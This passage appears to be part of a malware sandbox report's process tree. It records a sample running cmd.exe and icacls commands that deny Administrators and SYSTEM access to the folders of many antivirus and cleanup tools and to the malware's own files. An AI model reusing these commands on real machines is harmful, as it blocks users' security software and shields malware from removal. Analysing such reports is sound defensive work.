                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:1888
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                    icacls C:\Programdata\lsass.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                    PID:1416
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:3016
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                      icacls C:\Programdata\kz.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                                      PID:1732
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:1340
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                        icacls C:\Programdata\kz.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:1884
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                          PID:1332
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                            icacls C:\Programdata\script.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:848
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:2316
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                icacls C:\Programdata\script.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                  PID:2028
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                  PID:2276
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                    icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                    PID:2092
                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                    PID:2312
                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                      icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                      PID:2896
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                      PID:2148
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                        icacls C:\Programdata\MB3Install /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:2108
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                          PID:1224
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                            icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                            PID:2172
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                            PID:2260
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                              icacls C:\Programdata\olly.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                              PID:768
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                            PID:3052
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                              icacls C:\Programdata\olly.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                              PID:2064
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                            PID:2428
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                              icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                              PID:1900
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                            PID:336
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                              icacls C:\Programdata\lsass2.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:772
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                PID:2780
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                  icacls C:\Windows\boy.exe /deny Администраторы:(F)
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:864
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2300
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                      icacls C:\Windows\boy.exe /deny System:(F)
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2980
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2504
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                          icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                          PID:1736
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                          PID:1296
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:276
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                              PID:2528
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:2588
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:376
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:2576
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1756
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                        icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1484
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:324
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                            PID:400
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:288
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                              icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                              PID:2628
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:1440
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                PID:2156
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:2640
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                  icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:2424
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:572
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                      icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1168
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:612
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                          icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                          PID:1648
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:1280
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                            PID:296
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:2812
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                              icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:3000
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1972
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                  icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1904
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:1564
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                      icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2212
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:2132
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                          icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1572
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:1416
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                            icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2448
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:2024
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                              icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                              PID:2452
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:1252
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1672
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1268
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1068
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2464
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:876
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2508
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2200
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2312
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:904
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:536
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3068
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:924
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1940
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1612
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2708
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
